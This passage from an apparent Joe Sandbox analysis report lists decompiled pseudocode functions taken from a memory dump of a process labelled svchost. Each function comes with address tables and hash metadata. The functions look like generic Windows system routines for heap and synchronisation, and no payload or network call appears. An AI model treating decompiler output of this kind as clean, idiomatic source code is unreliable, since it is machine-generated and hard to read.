											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                        0x03038a0a
                        0x03038a1c
                        0x03038a23
                        0x03038a2e
                        0x03038a30
                        0x03038a36
                        0x03038a3c
                        0x03038a3e
                        0x03038a4a
                        0x03038a52
                        0x03038a9c
                        0x03038aae
                        0x03038a58
                        0x03038a5e
                        0x03038a6a
                        0x03038a6f
                        0x03038a75
                        0x03038a7d
                        0x03038a85
                        0x03038a86
                        0x03038a89
                        0x03038a93
                        0x03038a99
                        0x03038a9b
                        0x00000000
                        0x03038aaf
                        0x03038abe
                        0x03038ac3
                        0x03038acb
                        0x03038ad7
                        0x03038ae0
                        0x03038af1
                        0x00000000
                        0x03038af1
                        0x03038acd
                        0x03038ad5
                        0x03038afb
                        0x03038afd
                        0x03038aff
                        0x03038b07
                        0x03038b22
                        0x03038b24
                        0x03038b2a
                        0x03038b2e
                        0x03038b3f
                        0x03038b78
                        0x03038b41
                        0x03038b52
                        0x03038b54
                        0x03038b5c
                        0x03038b74
                        0x03038b74
                        0x03038b5c
                        0x03038b3f
                        0x03038b5e
                        0x03038b61
                        0x03038b64
                        0x03038b64
                        0x03038b6c
                        0x03038b6c
                        0x03038b11
                        0x03089cd5
                        0x03089cd5
                        0x03038b17
                        0x03038b1a
                        0x03038b1a
                        0x00000000
                        0x03038ad5
                        0x03038a89

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 231cf2bbb803660ea8b11ff0764869ade6d3ef4cdcd3c4c2ec93f749332037c2
                        • Instruction ID: 8769226e4ed727d305c5164044a3221de1e578780b5bc5d0e9287e8a8dae504d
                        • Opcode Fuzzy Hash: 231cf2bbb803660ea8b11ff0764869ade6d3ef4cdcd3c4c2ec93f749332037c2
                        • Instruction Fuzzy Hash: F74163B5A0232D9BDB64DF15CC88AEAB7FCEB85300F1485E9E81997251D7709E88CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030EAA16 Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030EAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E030EABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E030EAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E030EAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E030CCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L030477F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E03047D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E030E131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E030CCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                        0x030eaa1f
                        0x030eaa21
                        0x030eaa23
                        0x030eaa2b
                        0x030eaa30
                        0x030eaa36
                        0x030eaa39
                        0x030eaa42
                        0x030eaa75
                        0x030eaa7a
                        0x030eaa7c
                        0x030eaa7c
                        0x030eaa88
                        0x030eaa8a
                        0x030eaa8f
                        0x030eab02
                        0x030eab04
                        0x030eaa99
                        0x030eaaa8
                        0x030eaaaf
                        0x030eaab3
                        0x030eaacc
                        0x030eaad1
                        0x030eaad6
                        0x030eaae0
                        0x030eaaf3
                        0x030eaaf9
                        0x030eaafe
                        0x030eaafe
                        0x030eaaf3
                        0x030eaad6
                        0x030eaab3
                        0x030eab07
                        0x030eab0a
                        0x030eab11
                        0x030eab23
                        0x030eab13
                        0x030eab1c
                        0x030eab1c
                        0x030eab2b
                        0x030eab44
                        0x030eab44
                        0x030eab51
                        0x030eab51
                        0x030eaa44
                        0x030eaa47
                        0x030eaa4c
                        0x00000000
                        0x00000000
                        0x030eaa5a
                        0x030eaa64
                        0x030eaa72
                        0x00000000
                        0x030eaa66
                        0x030eaa66
                        0x030eaa68
                        0x030eaa6a
                        0x00000000
                        0x030eaa6a

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: 1023457d7c1d4514b16c9cd497ec3cc07c7e73b484066ba8cd620d720c59bb8b
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: 2231E436F12244AFDB15DB69CC85BAFF7BBEFC8610F094069E815AB292DB749D00C650
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030EFDE2 Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E030EFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E030EFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E030F0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03047D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E030E1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E030F2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E030EC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E030EDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03047D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E030EA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                        0x030efde7
                        0x030efde8
                        0x030efdec
                        0x030efdee
                        0x030efdf5
                        0x030efdf7
                        0x030efdfc
                        0x030efe19
                        0x030efe22
                        0x030efe26
                        0x030efec6
                        0x030efecd
                        0x030efed5
                        0x030efee7
                        0x030efed7
                        0x030efee0
                        0x030efee0
                        0x030efeef
                        0x030eff00
                        0x030eff02
                        0x030eff07
                        0x030eff07
                        0x00000000
                        0x030efeef
                        0x030efe33
                        0x030efe55
                        0x030efe59
                        0x030efe5b
                        0x030efe5e
                        0x030efe69
                        0x030efe6d
                        0x030efe6d
                        0x030efe69
                        0x030efe35
                        0x030efe41
                        0x030efe41
                        0x030efe79
                        0x030efe8b
                        0x030efe7b
                        0x030efe84
                        0x030efe84
                        0x030efe93
                        0x00000000
                        0x030efea8
                        0x030efeba
                        0x00000000
                        0x030efeba
                        0x030efdfe
                        0x030efe01
                        0x030efe02
                        0x030efe08
                        0x030eff0c
                        0x030eff14
                        0x030eff14

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 6d3f7c8532f286b200e322c5902c9164ad4261ba1152819ebb2a0ada1c744ac0
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: 55310736302741AFD322DB68C844FAABBEAEFC5650F1E4459E8468B742DB74EC41C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030EEA55 Relevance: .1, Instructions: 111COMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E030EEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03042280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E030EE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0302F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0303FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E030EAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E030EBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03047D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E030DFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0303FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E030EA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                        0x030eea55
                        0x030eea66
                        0x030eea68
                        0x030eea6c
                        0x030eea6f
                        0x030eea72
                        0x030eea75
                        0x030eea7a
                        0x030eea7a
                        0x030eea7e
                        0x030eea80
                        0x030eea85
                        0x030eea8b
                        0x030eeab5
                        0x030eeabc
                        0x030eeabf
                        0x030eeabf
                        0x030eeaca
                        0x030eeace
                        0x030eead0
                        0x030eeae4
                        0x030eeaeb
                        0x030eeaf0
                        0x030eeaf5
                        0x030eeb09
                        0x030eeb0d
                        0x030eeb1d
                        0x030eeb2d
                        0x030eeb38
                        0x030eeb3d
                        0x030eeb41
                        0x030eeb4a
                        0x030eeb60
                        0x030eeb4c
                        0x030eeb52
                        0x030eeb59
                        0x030eeb59
                        0x030eeb68
                        0x030eeb71
                        0x030eeb71
                        0x030eea8d
                        0x030eea8f
                        0x030eea92
                        0x030eea97
                        0x030eea97
                        0x030eea9b
                        0x030eea9c
                        0x030eea9e
                        0x030eeaa6
                        0x030eeaa6
                        0x030eeb7e

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: 672bfd708b1a48836eb2c4a9cc5d61bc3719f9b01f271e8be8b466e330bc2abf
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: 8A31B476706709AFC719DF24C880A9BB7E9FFC4210F08492DF5568B644DE30E805C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A69A6 Relevance: .1, Instructions: 108COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E030A69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x311d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03036C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E030A6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03069980() >= 0) {
							E03042280(_t56, 0x3118778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3118774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3118774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0302B6F0(0x300c338, 0x300c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03069520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E030695D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0303FFB0(_t68, _t77, 0x3118778);
				}
				_pop(_t78);
				return E0306B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                        0x030a69b5
                        0x030a69be
                        0x030a69c3
                        0x030a69c9
                        0x030a69cc
                        0x030a69d1
                        0x030a69d3
                        0x030a69de
                        0x030a69e1
                        0x030a69ea
                        0x030a69f6
                        0x030a69fe
                        0x030a6a13
                        0x030a6a14
                        0x030a6a15
                        0x030a6a16
                        0x030a6a1e
                        0x030a6a26
                        0x030a6a31
                        0x030a6a36
                        0x030a6a37
                        0x030a6a40
                        0x030a6a49
                        0x030a6a4a
                        0x030a6a53
                        0x030a6a59
                        0x030a6a5d
                        0x030a6a5e
                        0x030a6a64
                        0x030a6a67
                        0x030a6a6a
                        0x030a6a6d
                        0x030a6a70
                        0x030a6a77
                        0x030a6a7d
                        0x030a6a86
                        0x030a6a89
                        0x030a6a9c
                        0x030a6a9f
                        0x030a6aa2
                        0x030a6aa5
                        0x030a6aaf
                        0x030a6ab1
                        0x030a6ab8
                        0x030a6ab9
                        0x030a6abb
                        0x030a6abe
                        0x030a6ac5
                        0x030a6ac5
                        0x030a6aaf
                        0x030a6a40
                        0x030a6a26
                        0x030a69fe
                        0x030a6ace
                        0x030a6ad0
                        0x030a6ad3
                        0x030a6ad8
                        0x030a6adf
                        0x030a6adf
                        0x030a6ae8
                        0x030a6aef
                        0x030a6aef
                        0x030a6af9
                        0x030a6b06

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fcd4f9a8952251f7d34f681171f2ca8314e820b16adcab74582d0cd4f71fcd3c
                        • Instruction ID: 3ebbdefedc1108a3845fdc3798429bfdfbf165583ec86013f2c9ddc430a912a9
                        • Opcode Fuzzy Hash: fcd4f9a8952251f7d34f681171f2ca8314e820b16adcab74582d0cd4f71fcd3c
                        • Instruction Fuzzy Hash: 31416AB1E02708AFDB14DFA9D940BFEBBF8EF48714F08812AE814A7250DB719905CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03025210 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E03025210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E030252A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E030695D0();
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0303EB70(_t54, 0x31179a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E030695D0();
								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0303EB70(_t54, 0x31179a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0306F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0303EB70(_t54, 0x31179a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E030695D0();
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                        0x03025220
                        0x03025224
                        0x03080d13
                        0x03080d16
                        0x03080d19
                        0x0302522a
                        0x0302522a
                        0x0302522d
                        0x0302522d
                        0x03025231
                        0x03025235
                        0x03025239
                        0x03080d5c
                        0x03080d62
                        0x00000000
                        0x00000000
                        0x03080d6a
                        0x03080d7b
                        0x03080d7f
                        0x03080d81
                        0x03080d84
                        0x03080d95
                        0x03080d95
                        0x03080d6c
                        0x03080d71
                        0x03080d71
                        0x03080d9a
                        0x00000000
                        0x0302524a
                        0x0302524a
                        0x03025250
                        0x03080d24
                        0x03080d35
                        0x03080d39
                        0x03080d3b
                        0x03080d3e
                        0x03080d50
                        0x03080d50
                        0x03080d26
                        0x03080d2b
                        0x03080d2b
                        0x00000000
                        0x03080d55
                        0x03025256
                        0x0302525b
                        0x03025265
                        0x03080da7
                        0x0302526b
                        0x0302526e
                        0x03025272
                        0x03080db1
                        0x03080db4
                        0x03080dc5
                        0x03080dc5
                        0x03025272
                        0x03025278
                        0x0302527e
                        0x0302528a
                        0x0302528c
                        0x0302528d
                        0x00000000
                        0x03025280
                        0x03025282
                        0x03025288
                        0x0302529f
                        0x03025292
                        0x00000000
                        0x03025292
                        0x00000000
                        0x03025288
                        0x0302527e

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b67a97c65236850ef04c8a888c5e4ba273acb78cca28a33949468cd3361fce7a
                        • Instruction ID: 0464d92ffd5bfb43eee771ce51b16c30bf5e7a7f4b8964b6bb325bf9e6feb240
                        • Opcode Fuzzy Hash: b67a97c65236850ef04c8a888c5e4ba273acb78cca28a33949468cd3361fce7a
                        • Instruction Fuzzy Hash: F3310831643710EBC722EB18CC40FAAFBA9FF82764F154A2AE4550B5D0DB70E908C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305A61C Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E0305A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3100220);
				E0307D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3117b9c; // 0x0
				_t55 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0307D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3117b10 =  *0x3117b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x311536c; // 0x77495368
					if( *_t51 != 0x3115368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3115368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x311536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0305A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                        0x0305a61c
                        0x0305a61e
                        0x0305a623
                        0x0305a628
                        0x0305a62b
                        0x0305a62d
                        0x0305a648
                        0x0305a64a
                        0x0305a64f
                        0x03099b44
                        0x0305a6ec
                        0x0305a6f1
                        0x0305a6f1
                        0x0305a655
                        0x0305a657
                        0x0305a65a
                        0x0305a65d
                        0x0305a662
                        0x0305a663
                        0x0305a667
                        0x0305a668
                        0x0305a66d
                        0x0305a706
                        0x0305a706
                        0x03099bda
                        0x03099be6
                        0x03099beb
                        0x00000000
                        0x03099beb
                        0x0305a679
                        0x03099b7a
                        0x00000000
                        0x03099b7a
                        0x0305a683
                        0x0305a6f4
                        0x0305a6f7
                        0x0305a6f9
                        0x0305a6fd
                        0x0305a6a0
